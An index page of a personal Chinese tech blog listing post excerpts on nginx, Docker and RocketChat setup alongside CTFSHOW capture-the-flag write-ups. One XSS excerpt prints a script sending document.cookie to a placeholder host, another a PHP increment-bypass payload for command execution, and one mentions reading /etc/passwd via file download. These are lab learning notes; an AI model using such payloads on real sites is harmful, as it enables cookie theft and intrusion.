会员
周边
新闻
博问
闪存
众包
赞助商
Chat2DB
所有博客
当前博客
我的博客
我的园子
账号设置
会员中心
简洁模式
...
退出登录
注册
登录
Loading
Aninock
首页
联系
订阅
管理
上一页
1
2
3
4
5
6
7
···
10
下一页
2022年2月24日
nginx https 单机设置自签名证书
摘要: nginx配置好后访问会提示不安全 这时候就需要配置ssl证书,一般都是购买或者申请的,如果是内网可以用自签名证书 前置条件要安装openssl,centos7.9应该默认安装 可以通过 以下指令查看版本 openssl version 首先安装nginx,创建目录,等会证书文件就放在这 mkdir
阅读全文
posted @ 2022-02-24 00:45 Aninock
阅读(1409)
评论(0)
推荐(0)
2022年2月19日
nginx 反代理设置
摘要: centos7.9 安装nginx 先下一些环境 yum install -y gcc yum install -y pcre pcre-devel yum install -y zlib zlib-devel yum install -y openssl openssl-devel nginx直接
阅读全文
posted @ 2022-02-19 11:48 Aninock
阅读(72)
评论(0)
推荐(0)
2022年2月9日
CTFSHOW-日刷-春节欢乐赛
摘要: 拿了两个月会员。。 热身 很明显是一句话木马,但是直接找找不到flag,这里要用到find 直接找flag找不到这里查secret,找到了cat secret.php即可 web1 这是一个写入函数,传入一个参数,前面作为写入的文件名content,写入的内容是一个退出语句加上content 比如我
阅读全文
posted @ 2022-02-09 08:57 Aninock
阅读(676)
评论(0)
推荐(0)
2022年1月27日
CTFSHOW-日刷-摆烂杯-黑客网站-tor
摘要: 进去是一个网站,主页是字符画,尝试看看f12 看到提示不要扫描和渗透,前端确实只有字符 看wp,字符串结尾是onion 意思是用tor访问,没下这个,这里先记下,下了补上。
阅读全文
posted @ 2022-01-27 06:13 Aninock
阅读(237)
评论(0)
推荐(0)
centos doker安装/使用
摘要: 基本环境 yum install -y yum-utils device-mapper-persistent-data lvm2 换源 yum-config-manager --add-repo http://mirrors.aliyun.com/docker-ce/linux/centos/doc
阅读全文
posted @ 2022-01-27 05:55 Aninock
阅读(110)
评论(0)
推荐(0)
2022年1月21日
CTFSHOW-日刷-摆烂杯-登陆不了-tomcat/jsp
摘要: 进去是一个主页,点击注册 发现注册这里的验证码没用到,而且内容也一直不变,右击新建打开 发现传了一串base64的参数,解码是c81e728.jpg,怀疑是任意文件下载,尝试下载 /etc/passwd 确实是任意文件下载,下面就是要再找到flag的路径 尝试确定中间件,这里我先看了历史命令记录,下
阅读全文
posted @ 2022-01-21 16:57 Aninock
阅读(218)
评论(0)
推荐(0)
2022年1月2日
最简centos7单机安装RocketChat
摘要: 面对最简单的系统来装的,所以啥东西都要自己装 因为最后我要在断网状态下安装,所以中间涉及的安装包我都是先下载,再安装,不一次性安装 准备 一开始就发现wget没有 yum install --downloadonly --downloaddir=下载路径 wget rpm -i 下载的文件 换源(下
阅读全文
posted @ 2022-01-02 15:16 Aninock
阅读(419)
评论(1)
推荐(0)
2021年12月31日
第一次AWD记录一下
摘要: ctf打到现在第一次打AWD 这次是每组两个人有两个主机要保护,由于一共就比1.5h,前15分钟加固,后面是混战 目标是保护flag,同时两台主机的网站必须能访问(php),大家开始都一样 两台主机开始都不是root权限,我们开始进去首先改了下ssh密码,由于提示开始网站里有自带后门,所以尝试找后门
阅读全文
posted @ 2021-12-31 21:27 Aninock
阅读(83)
评论(0)
推荐(0)
2021年12月9日
ctf_show-web入门-XSS(316-333) 未完
摘要: web316 <script>var img = document.createElement("img");//创建img标签 img.src = "http://ip?cookie="+document.cookie;//设置img标签的src </script>或者<script>locati
阅读全文
posted @ 2021-12-09 20:54 Aninock
阅读(314)
评论(0)
推荐(0)
CTFSHOW-日刷-红包题第九弹-shellme_Revenge-自增绕过
摘要: 根据cookie里面的提示,get传入looklook参数 代码就是无符号命令执行,注意数字1到3和大写字母C没过滤 ~和|和^都过滤掉了,注意$没过滤,加减也没过滤可以尝试自增构造 payload ctf_show=$_=C;$_++;$C=++$_;$_++;$C_=++$_;$_++;$_++
阅读全文
posted @ 2021-12-09 19:52 Aninock
阅读(414)
评论(0)
推荐(0)
上一页
1
2
3
4
5
6
7
···
10
下一页
公告